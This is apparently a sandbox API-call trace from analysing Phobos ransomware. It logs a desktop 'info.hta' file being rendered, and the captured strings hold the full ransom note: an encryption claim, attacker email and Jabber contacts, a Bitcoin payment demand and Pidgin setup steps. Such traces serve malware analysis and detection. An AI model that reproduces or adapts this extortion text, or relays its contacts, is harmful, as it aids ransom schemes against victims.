[0231.956] LsCreateLine () returned 0x0 [0231.956] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0231.957] LsQueryLineDup () returned 0x0 [0231.957] LsDestroyLine () returned 0x0 [0231.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0231.957] CreateUri (in: pwzURI="http://www.coindesk.com/information/how-can-i-buy-bitcoins/", dwFlags=0x2b81, dwReserved=0x0, ppURI=0x41e7cc | out: ppURI=0x41e7cc*=0x50b124) returned 0x0 [0231.957] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41e6e0 | out: ppu=0x41e6e0) returned 0x0 [0231.958] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x41e79c | out: ppURI=0x41e79c*=0x49c07c) returned 0x0 [0231.958] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41e764 | out: ppvObject=0x41e764*=0x49c07c) returned 0x0 [0231.958] IUnknown:Release (This=0x49c07c) returned 0xe [0231.958] IUnknown:AddRef (This=0x49c07c) returned 0xf [0231.958] CoInternetCombineIUri (in: pBaseUri=0x49c07c, pRelativeUri=0x50b124, dwCombineFlags=0x6000000, ppCombinedUri=0x41e7d0, dwReserved=0x0 | out: ppCombinedUri=0x41e7d0*=0x50b124) returned 0x0 [0231.958] IUnknown:Release (This=0x49c07c) returned 0xf [0231.958] IUnknown:Release (This=0x49c07c) returned 0xe [0231.958] IUnknown:QueryInterface (in: This=0x505568, riid=0x74157ac0*(Data1=0xcd040b2, Data2=0x39ba, Data3=0x4cdf, Data4=([0]=0x96, [1]=0xcf, [2]=0xc1, [3]=0x92, [4]=0x9d, [5]=0x3b, [6]=0x98, [7]=0x98)), ppvObject=0x41e7dc | out: ppvObject=0x41e7dc*=0x505568) returned 0x0 [0231.958] IUnknown:Release (This=0x505568) returned 0x2 [0231.958] IUnknown:Release (This=0x50b124) returned 0x4 [0231.958] IUnknown:Release (This=0x50b124) returned 0x3 [0231.958] IsOS (dwOS=0x25) returned 1 [0231.958] GetSysColor (nIndex=26) returned 0xcc6600 [0231.958] LsSetDoc () returned 0x0 [0231.958] LsCreateLine () returned 0x0 [0231.958] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0231.960] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2e4) returned 0x50d100 [0231.960] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x194) returned 0x5031b8 [0231.960] LsQueryLineDup () returned 0x0 [0231.960] LsDestroyLine () returned 0x0 [0231.960] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0231.961] LsSetDoc () returned 0x0 [0231.961] LsCreateLine () returned 0x0 [0231.961] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0231.961] LsQueryLineDup () returned 0x0 [0231.961] LsDestroyLine () returned 0x0 [0231.961] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0231.961] LsSetDoc () returned 0x0 [0231.961] LsCreateLine () returned 0x0 [0231.961] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0231.962] LsQueryLineDup () returned 0x0 [0231.962] LsDestroyLine () returned 0x0 [0231.962] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.189] GetOutlineTextMetricsW (in: hdc=0xc0106ce, cjCopy=0xd8, potm=0x41e6b0 | out: potm=0x41e6b0) returned 0xd8 [0232.373] SelectObject (hdc=0xc0106ce, h=0x18a002e) returned 0x30a072b [0232.373] SelectObject (hdc=0xc0106ce, h=0x30a072b) returned 0x18a002e [0232.373] GetTextFaceW (in: hdc=0xc0106ce, c=32, lpName=0x41e900 | out: lpName="Wingdings") returned 10 [0232.373] SelectObject (hdc=0xc0106ce, h=0x18a002e) returned 0x30a072b [0232.492] LsSetDoc () returned 0x0 [0232.492] LsCreateLine () returned 0x0 [0232.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.493] LsQueryLineDup () returned 0x0 [0232.493] LsDestroyLine () returned 0x0 [0232.493] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.493] LsSetDoc () returned 0x0 [0232.493] LsCreateLine () returned 0x0 [0232.493] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.493] LsQueryLineDup () returned 0x0 [0232.494] LsDestroyLine () returned 0x0 [0232.494] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.494] LsSetDoc () returned 0x0 [0232.494] LsCreateLine () returned 0x0 [0232.494] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.494] LsQueryLineDup () returned 0x0 [0232.494] LsDestroyLine () returned 0x0 [0232.494] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.494] LsSetDoc () returned 0x0 [0232.494] LsCreateLine () returned 0x0 [0232.494] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.495] LsQueryLineDup () returned 0x0 [0232.495] LsDestroyLine () returned 0x0 [0232.495] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.495] LsSetDoc () returned 0x0 [0232.495] LsCreateLine () returned 0x0 [0232.495] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.496] LsQueryLineDup () returned 0x0 [0232.496] LsDestroyLine () returned 0x0 [0232.496] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.496] LsSetDoc () returned 0x0 [0232.497] LsCreateLine () returned 0x0 [0232.497] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.498] LsQueryLineDup () returned 0x0 [0232.498] LsDestroyLine () returned 0x0 [0232.498] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.498] LsSetDoc () returned 0x0 [0232.498] LsCreateLine () returned 0x0 [0232.498] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.499] LsQueryLineDup () returned 0x0 [0232.499] LsDestroyLine () returned 0x0 [0232.499] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.499] LsSetDoc () returned 0x0 [0232.499] LsCreateLine () returned 0x0 [0232.499] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.499] LsQueryLineDup () returned 0x0 [0232.500] LsDestroyLine () returned 0x0 [0232.500] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.500] LsSetDoc () returned 0x0 [0232.500] LsCreateLine () returned 0x0 [0232.500] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.500] LsQueryLineDup () returned 0x0 [0232.500] LsDestroyLine () returned 0x0 [0232.500] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.500] LsSetDoc () returned 0x0 [0232.500] LsCreateLine () returned 0x0 [0232.500] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.501] LsQueryLineDup () returned 0x0 [0232.502] LsDestroyLine () returned 0x0 [0232.502] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.502] LsSetDoc () returned 0x0 [0232.502] LsCreateLine () returned 0x0 [0232.502] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.502] LsQueryLineDup () returned 0x0 [0232.502] LsDestroyLine () returned 0x0 [0232.502] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.502] LsSetDoc () returned 0x0 [0232.502] LsCreateLine () returned 0x0 [0232.502] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.503] LsQueryLineDup () returned 0x0 [0232.503] LsDestroyLine () returned 0x0 [0232.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.503] LsSetDoc () returned 0x0 [0232.503] LsCreateLine () returned 0x0 [0232.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.504] LsQueryLineDup () returned 0x0 [0232.504] LsDestroyLine () returned 0x0 [0232.504] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.504] LsSetDoc () returned 0x0 [0232.504] LsCreateLine () returned 0x0 [0232.504] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.505] CreateUri (in: pwzURI="https://www.youtube.com/results?search_query=pidgin+jabber+install", dwFlags=0x2b81, dwReserved=0x0, ppURI=0x41e3cc | out: ppURI=0x41e3cc*=0x50b1fc) returned 0x0 [0232.505] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41e2e0 | out: ppu=0x41e2e0) returned 0x0 [0232.505] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x41e39c | out: ppURI=0x41e39c*=0x49c07c) returned 0x0 [0232.505] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41e364 | out: ppvObject=0x41e364*=0x49c07c) returned 0x0 [0232.505] IUnknown:Release (This=0x49c07c) returned 0xf [0232.505] IUnknown:AddRef (This=0x49c07c) returned 0x10 [0232.505] CoInternetCombineIUri (in: pBaseUri=0x49c07c, pRelativeUri=0x50b1fc, dwCombineFlags=0x6000000, ppCombinedUri=0x41e3d0, dwReserved=0x0 | out: ppCombinedUri=0x41e3d0*=0x50b1fc) returned 0x0 [0232.505] IUnknown:Release (This=0x49c07c) returned 0x10 [0232.505] IUnknown:Release (This=0x49c07c) returned 0xf [0232.505] IUnknown:QueryInterface (in: This=0x505568, riid=0x74157ac0*(Data1=0xcd040b2, Data2=0x39ba, Data3=0x4cdf, Data4=([0]=0x96, [1]=0xcf, [2]=0xc1, [3]=0x92, [4]=0x9d, [5]=0x3b, [6]=0x98, [7]=0x98)), ppvObject=0x41e3dc | out: ppvObject=0x41e3dc*=0x505568) returned 0x0 [0232.506] IUnknown:Release (This=0x505568) returned 0x2 [0232.506] IUnknown:Release (This=0x50b1fc) returned 0x4 [0232.506] IUnknown:Release (This=0x50b1fc) returned 0x3 [0232.506] IsOS (dwOS=0x25) returned 1 [0232.506] GetSysColor (nIndex=26) returned 0xcc6600 [0232.506] LsQueryLineDup () returned 0x0 [0232.506] LsDestroyLine () returned 0x0 [0232.506] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.506] LsSetDoc () returned 0x0 [0232.506] LsCreateLine () returned 0x0 [0232.506] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.507] LsQueryLineDup () returned 0x0 [0232.507] LsDestroyLine () returned 0x0 [0232.507] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.507] LsSetDoc () returned 0x0 [0232.507] LsCreateLine () returned 0x0 [0232.507] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.507] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da838 [0232.507] LsSetDoc () returned 0x0 [0232.507] LsCreateLine () returned 0x0 [0232.507] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.507] LsQueryLineDup () returned 0x0 [0232.508] LsDestroyLine () returned 0x0 [0232.508] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.508] LsdnFinishRegular () returned 0x0 [0232.508] LsQueryLineDup () returned 0x0 [0232.508] LsQueryLineCpPpoint () returned 0x0 [0232.508] LsDestroyLine () returned 0x0 [0232.508] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4da838 | out: hHeap=0x470000) returned 1 [0232.508] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.508] LsSetDoc () returned 0x0 [0232.508] LsCreateLine () returned 0x0 [0232.508] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.509] LsQueryLineDup () returned 0x0 [0232.509] LsDestroyLine () returned 0x0 [0232.509] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.509] LsSetDoc () returned 0x0 [0232.509] LsCreateLine () returned 0x0 [0232.509] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.510] LsQueryLineDup () returned 0x0 [0232.510] LsDestroyLine () returned 0x0 [0232.510] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.510] LsSetDoc () returned 0x0 [0232.510] LsCreateLine () returned 0x0 [0232.510] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.511] LsQueryLineDup () returned 0x0 [0232.511] LsDestroyLine () returned 0x0 [0232.511] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.511] LsSetDoc () returned 0x0 [0232.511] LsCreateLine () returned 0x0 [0232.511] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.511] LsQueryLineDup () returned 0x0 [0232.511] LsDestroyLine () returned 0x0 [0232.511] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.511] LsSetDoc () returned 0x0 [0232.511] LsCreateLine () returned 0x0 [0232.511] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0232.511] LsQueryLineDup () returned 0x0 Thread: id = 225 os_tid = 0x31c Thread: id = 243 os_tid = 0x330 [0224.439] GetCurrentThreadId () returned 0x330 [0224.439] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x73f40000 [0224.439] CoInitialize (pvReserved=0x0) returned 0x0 [0224.439] GetTickCount () returned 0x201d4 [0224.439] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1006) returned 0x4b4ad8 [0224.439] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b31a8 | out: hHeap=0x470000) returned 1 [0224.439] IInternetProtocol:Read (in: This=0x4b2508, pv=0x4b4ba0, cb=0xf38, pcbRead=0x273fc34 | out: pv=0x4b4ba0, pcbRead=0x273fc34*=0xf38) returned 0x0 [0224.439] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2006) returned 0x4b5ae8 [0224.440] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4b4ad8, cbMultiByte=4096, lpWideCharStr=0x4b5aec, cchWideChar=4096 | out: lpWideCharStr="\r\n\r\n \r\n \r\n phobos\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n \r\n
\r\n\x09\x09\r\n\x09\x09
All your files have been encrypted!
\r\n\x09
\r\n
All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail tedmundboardus@aol.com
\x09
Write this ID in the title of your message 9C354B42-0001
\r\n\x09
In case of no answer in 24 hours write us to this e-mail:tylecotebenji@aol.com
\r\n\x09
If there is no response from our mail, you can install the Jabber client and write to us in support of phobos_helper@xmpp.jp
\r\n
\r\n\x09\x09You have to pay for decryption in Bitcoins. The price d") returned 4096 [0224.440] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x108) returned 0x4b7af8 [0224.700] CoInitialize (pvReserved=0x0) returned 0x1 [0224.700] CoCreateInstance (in: rclsid=0x74090e58*(Data1=0x275c23e2, Data2=0x3747, Data3=0x11d0, Data4=([0]=0x9f, [1]=0xea, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3f, [6]=0x86, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74090e48*(Data1=0xdccfc164, Data2=0x2b38, Data3=0x11d2, Data4=([0]=0xb7, [1]=0xec, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x8f, [6]=0x5d, [7]=0x9a)), ppv=0x74479500 | out: ppv=0x74479500*=0x4af980) returned 0x0 [0225.385] IUnknown:QueryInterface (in: This=0x4af980, riid=0x74091170*(Data1=0x359f3441, Data2=0xbd4a, Data3=0x11d0, Data4=([0]=0xb1, [1]=0x88, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x38, [6]=0xc9, [7]=0x69)), ppvObject=0x74479504 | out: ppvObject=0x74479504*=0x4bfc90) returned 0x0 [0225.385] IUnknown:QueryInterface (in: This=0x4af980, riid=0x74091180*(Data1=0xdccfc162, Data2=0x2b38, Data3=0x11d2, Data4=([0]=0xb7, [1]=0xec, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x8f, [6]=0x5d, [7]=0x9a)), ppvObject=0x74479508 | out: ppvObject=0x74479508*=0x4be1f8) returned 0x0 [0225.472] CoUninitialize () [0225.472] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76180000 [0225.473] GetProcAddress (hModule=0x76180000, lpProcName="GetThreadUILanguage") returned 0x761bcf14 [0225.473] GetThreadUILanguage () returned 0x2730409 [0225.473] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x15a54) returned 0x4ce398 [0225.906] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ce398, Size=0x52ac) returned 0x4ce398 [0225.906] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x273fb98 | out: lpCPInfo=0x273fb98) returned 1 [0225.907] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x68) returned 0x4c2888 [0225.908] IUnknown:AddRef (This=0x49bd1c) returned 0xe [0225.908] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1a8) returned 0x4e6fa0 [0225.908] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x273fb7c | out: lpCPInfo=0x273fb7c) returned 1 [0225.908] IUnknown:AddRef (This=0x4a3d90) returned 0x4 [0225.908] IUnknown:AddRef (This=0x49bd1c) returned 0xf [0225.908] IUnknown:QueryInterface (in: This=0x49bd1c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x273fb84 | out: ppvObject=0x273fb84*=0x49bd1c) returned 0x0 [0225.908] IUnknown:Release (This=0x49bd1c) returned 0xf [0225.908] IUnknown:AddRef (This=0x49bd1c) returned 0x10 [0225.908] IUri:GetScheme (in: This=0x49bd1c, pdwScheme=0x273fb88 | out: pdwScheme=0x273fb88*=0x9) returned 0x0 [0225.908] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8006) returned 0x4d3650 [0225.908] IUnknown:Release (This=0x49bd1c) returned 0xf [0225.908] PostMessageW (hWnd=0x20166, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0225.909] GetTickCount () returned 0x20646 [0225.909] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1006) returned 0x4db660 [0225.909] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4000) returned 0x4dc670 [0225.909] IInternetProtocol:Read (in: This=0x4b2508, pv=0x4dc67c, cb=0x1000, pcbRead=0x273fc34 | out: pv=0x4dc67c, pcbRead=0x273fc34*=0x1000) returned 0x0 [0225.920] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4d3650, Size=0x3ee8) returned 0x4d3650 [0225.920] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4db660, cbMultiByte=4096, lpWideCharStr=0x4d5536, cchWideChar=4096 | out: lpWideCharStr="epends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\r\n\x09
\r\n\x09\r\n\x09
\r\n
Free decryption as guarantee
\r\n\x09\x09
    Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 10Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\x09
\r\n
\r\n\r\n
\r\n
How to obtain Bitcoins
\r\n \r\n
\r\n\x09
Jabber client installation instructions:
\r\n\x09
\r\n\x09\x09
    \r\n\x09\x09\x09
  • Download the jabber (Pidgin) client from https://pidgin.im/download/windows/
    • \r\n\x09\x09\x09
  • After installation, the Pidgin client will prompt you to create a new account.
    • \r\n\x09\x09\x09
  • Click \"Add\"
  • In the \"Protocol\" field, select XMPP
    • \r\n\x09\x09\x09
  • In \"Username\" - come up with any name
    • \r\n\x09\x09\x09
  • In the field \"domain\" - enter any jabber-server, there are a lot of them, for example - exploit.im
    • \r\n\x09\x09\x09
  • Create a password
  • At the bottom, put a tick \"Create account\"
    • \r\n\x09\x09\x09
  • Click add
    • \r\n\x09\x09\x09
  • If you selected \"domain\" - exploit.im, then a new window should appear in which you will need to re-enter your data:
    • \r\n\x09\x09\x09
      \r\n\x09\x09\x09\x09
    • User
      • \r\n\x09\x09\x09\x09
    • password
      • \r\n\x09\x09\x09\x09
    • You will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below)
      • \r\n\x09\x09\x09
    \r\n\x09\x09\x09
  • If you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install
    • \r\n\x09\x09
\r\n\x09
\r\n
\r\n
Attention!
\r\n
    \r\n
  • Do not rename encrypted files.
    • \r\n
  • Do not try to decrypt your data using third party software, it may cause permanent data loss.
    • \r\n
  • Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
    • \r\n
\r\n
\r\n\x09
\r\n\x09\x09\r\n\x09
\r\n
  • In the \"Protocol\" field, select XMPP
    • \r\n\x09\x09\x09
  • In \"Username\" - come up with any name
    • \r\n\x09\x09\x09
  • In the field \"domain\" - enter any jabber-server, there are a lot of them, for example - exploit.im
    • \r\n\x09\x09\x09
  • Create a password
  • At the bottom, put a tick \"Create account\"
    • \r\n\x09\x09\x09
  • Click add
    • \r\n\x09\x09\x09
  • If you selected \"domain\" - exploit.im, then a new window should appear in which you will need to re-enter your data:
    • \r\n\x09\x09\x09
      \r\n\x09\x09\x09\x09
    • User
      • \r\n\x09\x09\x09\x09
    • password
      • \r\n\x09\x09\x09\x09
    • You will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below)
      • \r\n\x09\x09\x09
    \r\n\x09\x09\x09
  • If you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install
    • \r\n\x09\x09\r\n\x09
    \r\n
    \r\n
    Attention!
    \r\n \r\n
    \r\n\x09
    \r\n\x09\x09\r\n\x09
    \r\n ?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0214.067] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x14f164 | out: lpCharType=0x14f164) returned 1 [0214.067] GetLastError () returned 0x0 [0214.067] SetLastError (dwErrCode=0x0) [0214.067] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0214.068] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f564, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0214.068] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f564, cbMultiByte=256, lpWideCharStr=0x14ee68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ茙Ꟶ溂´慠ꚇĀ") returned 256 [0214.068] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ茙Ꟶ溂´慠ꚇĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0214.068] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 